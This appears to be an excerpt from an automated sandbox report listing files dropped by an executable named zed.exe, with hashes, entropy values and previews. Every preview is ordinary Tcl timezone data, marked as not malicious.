                                                                                                                                                                                                                                            SHA-256:EB301EE97A9FDE8ACE0243941C0FAC9ED0E3ACFD6497ABE408F08E95FAE3B732
                                                                                                                                                                                                                                            SHA-512:A48EBDA0A93C3505BC6149863F4A7B1043F856A8EB516CF42C050A95E81CD152BC1C0313B3DD115D53DABA95413AF34902D7D11C984DE5A03FC5FFADAF8EA89F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Indian/Cocos) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.825881690094318
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6EL9TKlBx+DcVVMB:SlSWB9vsM3y7VTHAIgNTxcAN/+LxGV+V
                                                                                                                                                                                                                                            MD5:7EBDFA311C7852AFADF880395071DE48
                                                                                                                                                                                                                                            SHA1:F6EC21FDFB75EC1BE45B1C4170147CBA3E870E7B
                                                                                                                                                                                                                                            SHA-256:53FA58E32DC2E4ABB574B2F78011815EEB7F89F453CC63C6B6C1460ABBB4CA5C
                                                                                                                                                                                                                                            SHA-512:DFBCD4EA4AFFA1D1CAE7308168874527FD36B5CAE76153AADA9C5E5F628258AB26654A16C8A5F8906FC5918398FD880B15B6DD4E3EF6AD3BE63D4A2455701FA8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Comoro) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.822075418239496
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqKGE4YF3vXHAIgnGED9HRL/+L6EL12h6hwL6ELzEov:SlSWB9vsM3ypGEVFPHAIgnGEtN/+L5Ry
                                                                                                                                                                                                                                            MD5:9AB222C67E079B55DDF3ACAE67BD0261
                                                                                                                                                                                                                                            SHA1:F9E6C34A00F9F1B152CEA729F087BD24993CA2E8
                                                                                                                                                                                                                                            SHA-256:138C7FFBFC520372658CA0CD1B42C4E5A240E9D9B98A277B02481DE5701222FC
                                                                                                                                                                                                                                            SHA-512:5F3EFF78506056F981DB0446436B39953D90265227890176D8287E2149B176B9DCCA14E795083B1EBC202D02AA88D584A9BB49868F30895EF17E92AA98ACB7C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Indian/Maldives)]} {.. LoadTimeZoneFile Indian/Maldives..}..set TZData(:Indian/Kerguelen) $TZData(:Indian/Maldives)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.84472938642971
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/+L6ELzJM1h4WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/+L/Yh4wKC
                                                                                                                                                                                                                                            MD5:C866B2A879786B7D9341FA904FC7D01A
                                                                                                                                                                                                                                            SHA1:DAF7B405E6DAA0C88C6F3A26AAA172E38CE5CAF3
                                                                                                                                                                                                                                            SHA-256:613C5C05A8867E4B59A97A3D8C7235DDC0CA23239F2D57A5BFD42E4AB94FD510
                                                                                                                                                                                                                                            SHA-512:BB01A464366F1F93591F48C42F300421AF774E50E5B5232AB0C755482E3306EDDB54A9BCF6E9D325EAE63AAC6D3857F4D754FC28A34F90AC728B7158B61E2C57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Indian/Mahe) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.883092265054605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/+L6ELzE5FNMXGm2OHnz8eoHvZT5lxV/uUQwGN0VQVFv:SlSWB9eg/+L/EJDm2OHnz8eoHvZT5rdI
                                                                                                                                                                                                                                            MD5:4DF975C040D78FA8F9C92E5565D63A73
                                                                                                                                                                                                                                            SHA1:48488F076871530D32278084F1C9CB90CB1E6AB4
                                                                                                                                                                                                                                            SHA-256:9FAC69DC609CC6074ECD67E0BE8AE62E33D8D9C7F055A3E0DEE1430C7FFC54F6
                                                                                                                                                                                                                                            SHA-512:880B920FB51F48731BA8C741B9583038A3276221C55F1CE0B464D2797D71EF9D22B4E166841BAB0544B7091CE683697BFCA5A4235FF1E6264B0619DBDD4BB619
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Maldives) {.. {-9223372036854775808 17640 0 LMT}.. {-2840158440 17640 0 MMT}.. {-315636840 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):272
                                                                                                                                                                                                                                            Entropy (8bit):4.5144164346164715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/+L/GDm2OHlNnoH9SvulvSNFF+c0FSFFMVhvSNFFVBjvVFSFFVGlvSN:MB86+L/CmdHlNnCy6qB0FScZq9BjVFSL
                                                                                                                                                                                                                                            MD5:05362B6A17C5F4F4E8CBE5A676D5D0DE
                                                                                                                                                                                                                                            SHA1:84675D5E8D1425A5E9DB07D1BC1E6A5921B5AC91
                                                                                                                                                                                                                                            SHA-256:A2B1B93CBEECBD900ED71E61A4932509EB52688E97A6015DAD067066D0D42072
                                                                                                                                                                                                                                            SHA-512:351D2BC5F5888D8E842BF160D11D57E059811186D63B0413061768C7FE348CECB700748A0C0125F0ABCBB039FC74FF7BEEFDD42088BA1E28C785E545ED2CDF24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Mauritius) {.. {-9223372036854775808 13800 0 LMT}.. {-1988164200 14400 0 +04}.. {403041600 18000 1 +04}.. {417034800 14400 0 +04}.. {1224972000 18000 1 +04}.. {1238274000 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.828945679595274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6ELzO1h4DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/+L/O1hm
                                                                                                                                                                                                                                            MD5:8ABBEC0E138C1A68CB5D096E822DE75E
                                                                                                                                                                                                                                            SHA1:E9C5CE1A249F6DC0F6EDBB3F5B00F3106E3BD6CA
                                                                                                                                                                                                                                            SHA-256:845C45FD7B6F0604B03A3C72DB117878B568FB537BCA078304727964157B96AB
                                                                                                                                                                                                                                            SHA-512:15790CCA70140D3139F3E2A202DC8F12E68466A367C68458D6A78CDDC7822FB5EDB87D630926B51F3DE48D95DE7CA3FCB946CD7B762FE5B15866DAA9DBA40B46
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Mayotte) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.825214661273383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/+L6ELsAceh4WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/+Lj4wKQ3
                                                                                                                                                                                                                                            MD5:7B22FE05231A5721C939B6018F8A2814
                                                                                                                                                                                                                                            SHA1:E272C25E79ABE705B2DB106D70DEAB3245EA9D35
                                                                                                                                                                                                                                            SHA-256:5560B0D4A2D8A13D9FE9787FFFE31200D405A8C875F046C8FDDF850AF98662B6
                                                                                                                                                                                                                                            SHA-512:26244855D029151B84A4D57E2FA69632B4F19F8C00B2E500A394D76A29857BE2A412344794BA0DFF50A2863FF17889210A151D0E231A67E55091F4909EC4AE79
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Indian/Reunion) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):166
                                                                                                                                                                                                                                            Entropy (8bit):4.809541513808179
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8g5YFeovXHAIgNqjyVHRL/+XiMr4WFKBpv:SlSWB9vsM3yA5oPHAIgcjeHN/+Xvr4wY
                                                                                                                                                                                                                                            MD5:A90C26358FEF60E49044E3BE02866FAC
                                                                                                                                                                                                                                            SHA1:137AC8CCA23F39E7A16C4050EA9A3A8731E9AAD7
                                                                                                                                                                                                                                            SHA-256:FE7F4453CB5F6B81B23C1C795356B91FE319F0762BE7868FAFE361DB1F9C2A2B
                                                                                                                                                                                                                                            SHA-512:D6C74CACF69D29E14CB46E5DD885234AC50EE2E258E0C5E3AC76465061622F064F974D33E91A6A020B9D618D90799DDA6EB1EA53022EDB6E26A9CB6ADFE0AA30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Tehran)]} {.. LoadTimeZoneFile Asia/Tehran..}..set TZData(:Iran) $TZData(:Asia/Tehran)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.8290104377288925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/+WXnMr4WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/+zr4wKY+
                                                                                                                                                                                                                                            MD5:6BCC43951637D86ED54585BE0819E39C
                                                                                                                                                                                                                                            SHA1:6F04F306B3AB2A6419377294238B3164F86EF4A3
                                                                                                                                                                                                                                            SHA-256:805105F5F17B78929F8476BAE83ED972128633FF6F74B7748B063E3C810C27A6
                                                                                                                                                                                                                                            SHA-512:ABB9F4308BF4BD5C62C215A7ECD95042CBFB3005AF1E75F640962B022574C930DD5A12CD0CE0AF8A3D7E38B999E37C3A45A55091683F6A87E9D0CDA9EE417293
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Israel) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.722012123002917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx00EIECWXHAIg200EIE/vHRL/9S//2IAcGE0EIESvn:SlSWB9vsM3y795VHAIgp95HN/029095c
                                                                                                                                                                                                                                            MD5:1F020341AD51AA82794B8018F214DE0D
                                                                                                                                                                                                                                            SHA1:4414E56C1277B4D31FE557F8652D522C0594F4B2
                                                                                                                                                                                                                                            SHA-256:F01B00D52BD7B2694BF5CB55A17028C30A41BD22A774CA54740E8B1DDE4FCB2E
                                                                                                                                                                                                                                            SHA-512:CC41848A851D4992AE9F27C38669CB87CE2FD05A33AB6989EA21AFCB1A2707DE0CB4D62BCC45E536DD944859991D7564847205F47509A42D41932370496A77D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Jamaica)]} {.. LoadTimeZoneFile America/Jamaica..}..set TZData(:Jamaica) $TZData(:America/Jamaica)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                                                            Entropy (8bit):4.8422204749795545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8aofXHAIgNqsRL/9hM7/4WFK9vn:SlSWB9vsM3ypPHAIgcsN/4r4wKNn
                                                                                                                                                                                                                                            MD5:9554A65BFFCFFCFB2C1588569BB4638E
                                                                                                                                                                                                                                            SHA1:B377ECB04586396D37093856AEF8BBDC93192F66
                                                                                                                                                                                                                                            SHA-256:98DBD07AE3B9251B9091F4D265336CE98BDFB492AF863C1F3FF25248A2CADF35
                                                                                                                                                                                                                                            SHA-512:E2E761B8B1995B68721BC714A546E0F45EEC025FAF81DE579FF0D73D37783D0E031B9E78BA2FAC6B097E3673C47AFB8761FBC58E42E33018FD44B77F2871E0C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Tokyo)]} {.. LoadTimeZoneFile Asia/Tokyo..}..set TZData(:Japan) $TZData(:Asia/Tokyo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.810216093939366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG1/EOM23vXHAIgObT1/EOMH6RL/8/FMKpUDH1/Ex:SlSWB9vsM3yc1EiPHAIgOb1E+N/8xMEx
                                                                                                                                                                                                                                            MD5:05C0C40F2AA456F580EAAFC4F7E49B56
                                                                                                                                                                                                                                            SHA1:5796A9122693B2D6010BC5E617A6091F46330B0C
                                                                                                                                                                                                                                            SHA-256:85E95363ACF468043CD5146927A97B2D9E3B141EDA0A7993DADA9382D1D6DD54
                                                                                                                                                                                                                                            SHA-512:2155F8E3EB73312F0AFD5CDDF4B19EBB67A15658101870C2CEDF96955470DBC7B30F34E143D9C14CBFA7A138F63324009581BD0B807AE295C68588CA0470D7AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Kwajalein)]} {.. LoadTimeZoneFile Pacific/Kwajalein..}..set TZData(:Kwajalein) $TZData(:Pacific/Kwajalein)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.829980800076139
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsbKJqYkyXHAIgNGEnKJp0ARL/7beDcbKJ6v:SlSWB9vsM3y7JSHAIgNTxAN/PeDE
                                                                                                                                                                                                                                            MD5:4D44D88336212E162CCEFADE6321EDBC
                                                                                                                                                                                                                                            SHA1:B9EE7AFE26DC61AA9EA37EB99A3C10DD176E8063
                                                                                                                                                                                                                                            SHA-256:F776839C1999056E6A0D2ECFDF9054FC309454AFDFF8E8BC803F33EC423B7361
                                                                                                                                                                                                                                            SHA-512:FDDCBD194DE07B51DEBBDEF4FD96762EE3507117443FB9F7975FB56E0AE97B0D1F8657FE26B092021FB12B5A5D3EFFAB9E0A54B1C2AFCEC1029855442A0A95AB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Tripoli)]} {.. LoadTimeZoneFile Africa/Tripoli..}..set TZData(:Libya) $TZData(:Africa/Tripoli)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.799706947156251
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aJCP8D3pCS2JWk55EyqJNSPTub3NDOyFyJYVtLbTxdqs0xcQVq+O7JSAmwQZjltB:FSyWBSPTujlOyqc3JuzVNvTN
                                                                                                                                                                                                                                            MD5:02B993B4A6956014A2DB844E8A5498C0
                                                                                                                                                                                                                                            SHA1:378333547254AC43BEB4FA2CBC24B8DE241B3078
                                                                                                                                                                                                                                            SHA-256:DF45F5414F1636B1856C7534BB5F3D4387C32D56283A68BB47D8C48C1DDAD5BC
                                                                                                                                                                                                                                            SHA-512:CC3ABCC1FB5ABD10A685F140931DE38D6875142D3595F8D9A581F5B31A7F354FA4CCC9727B69F58E0D2F773EA0F76D9ACFDF7ACBAFC6BAA6E93A46EAE8F18672
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MET) {.. {-9223372036854775808 3600 0 MET}.. {-1693706400 7200 1 MEST}.. {-1680483600 3600 0 MET}.. {-1663455600 7200 1 MEST}.. {-1650150000 3600 0 MET}.. {-1632006000 7200 1 MEST}.. {-1618700400 3600 0 MET}.. {-938905200 7200 1 MEST}.. {-857257200 3600 0 MET}.. {-844556400 7200 1 MEST}.. {-828226800 3600 0 MET}.. {-812502000 7200 1 MEST}.. {-796777200 3600 0 MET}.. {-781052400 7200 1 MEST}.. {-766623600 3600 0 MET}.. {228877200 7200 1 MEST}.. {243997200 3600 0 MET}.. {260326800 7200 1 MEST}.. {276051600 3600 0 MET}.. {291776400 7200 1 MEST}.. {307501200 3600 0 MET}.. {323830800 7200 1 MEST}.. {338950800 3600 0 MET}.. {354675600 7200 1 MEST}.. {370400400 3600 0 MET}.. {386125200 7200 1 MEST}.. {401850000 3600 0 MET}.. {417574800 7200 1 MEST}.. {433299600 3600 0 MET}.. {449024400 7200 1 MEST}.. {465354000 3600 0 MET}.. {481078800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.902637155364683
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/6xtNMXGm2OHrXV4foAov:SlSWB9eg/6lDm2OHrCAAov
                                                                                                                                                                                                                                            MD5:36119516E87814F3C219193069CD6A90
                                                                                                                                                                                                                                            SHA1:BDB25531B30E6FC454100F37177EC9D4A0FB4E39
                                                                                                                                                                                                                                            SHA-256:E57746D5DB479A8B30973F2BC16E2B8DFB6E2BFAECBFF0FB956F04526E4B935B
                                                                                                                                                                                                                                            SHA-512:2730C5DABA0B2CCFD32A799C48EE07351659F51B9C2B91DCD145675AF276F2D0B5AA51ACF7D283C0DC236D3AFA3A75E58EB9F970B1831A6E36F02139CAF6A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST) {.. {-9223372036854775808 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8405400251137207
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:T1ktwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:TswDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:87B3BCD4A793BA383889ECFDB44C846E
                                                                                                                                                                                                                                            SHA1:3EA34B5E6E3078A9501653BA069D5E5E879D7FE4
                                                                                                                                                                                                                                            SHA-256:A5DEB89D59613D9A54C1E146056A805B3DE9F2A2593AEC2B8A25F863328699C0
                                                                                                                                                                                                                                            SHA-512:AA4DAC2614661EF18A2A60A5BD4D5BBBCCB5D721F90A25E9D11C5B6AF8C39FD475B3E23894719E2F8F74469F13D5492FF31DDD193D9E3172182FBCBCDD860A41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST7MDT) {.. {-9223372036854775808 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1 MDT}.. {247046400 -25200 0 MST}.. {262774800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.884776849010803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/6AdMSKBbh4IAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/68K5h490m
                                                                                                                                                                                                                                            MD5:3050A0100A2313C1D3AB4278B464F17A
                                                                                                                                                                                                                                            SHA1:1A140447B3972900F13768659FD6979F68126E97
                                                                                                                                                                                                                                            SHA-256:F8CA38A845CD01BF785EE222277DAD9325AB6BD17E44A362C450855AEB522814
                                                                                                                                                                                                                                            SHA-512:C91C4BF2318C50D473E6051855C12F0E11CBAA8580B88115CDDE054D36476A1D8DDC5D17A7A123BD84148C20B96BD839511EAD573F5FD2C9A8556646B9CDE5E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.8897674180962145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0zjRJ+ovXHAIg20zjRJ8yHRL/6AdMPCoQIAcGEzjy:SlSWB9vsM3y7zjRJvHAIgpzjRJ8yHN/Z
                                                                                                                                                                                                                                            MD5:FAFD9727A0E153AFCB726690D215DA76
                                                                                                                                                                                                                                            SHA1:3CD3B2737FC781F38DE26E255968CBB88B773CBF
                                                                                                                                                                                                                                            SHA-256:2E6E32A40487F0146B59150B66FF74901CA853B12D47922819AF23EEA5B4149C
                                                                                                                                                                                                                                            SHA-512:76D110494D4EB76961C818B2A2CCB2303B31DA161664FA712C87B95B81DE7B8F3E50DC7B2836C6ECC6437AE9595668E62E4E706F1B343EFEA12C32210F113540
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mazatlan)]} {.. LoadTimeZoneFile America/Mazatlan..}..set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.877941255622543
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7zBDSHAIgpzBx6N/6BXl490zBf:MByMYzppzH6t6Bi90z1
                                                                                                                                                                                                                                            MD5:29ACBFCD0FD521EC0C9523906B9E2252
                                                                                                                                                                                                                                            SHA1:BBC1AD3F78CAA634A2F0BC38059975EF8E4A2CE9
                                                                                                                                                                                                                                            SHA-256:2DFF1B83FECFAD5C27EC47B206696C29B91398F8185B5D406A66FA9E0AECA93F
                                                                                                                                                                                                                                            SHA-512:802502010CFB6F1F4E60C22ECB0E6CA22750975E5838BE7E7DC9D12EA019CB6508F0F87465A113A98356CC9E145E32E6633AE2B45B93412A358C4AD13E923EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mexico_City)]} {.. LoadTimeZoneFile America/Mexico_City..}..set TZData(:Mexico/General) $TZData(:America/Mexico_City)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.888611285267583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG/u4WXHAIgObT/KvRRL/5E1nUDH/uov:SlSWB9vsM3ycqXHAIgObOvRN/iy
                                                                                                                                                                                                                                            MD5:92548E239012515D756E002768CA876A
                                                                                                                                                                                                                                            SHA1:6BDC73DBD7356C3F82C5C76E6E2D58656FA9E21D
                                                                                                                                                                                                                                            SHA-256:E22D629D53C54960AD156C377DE0AE461C27F554990A3D1305724CA8F869BCE4
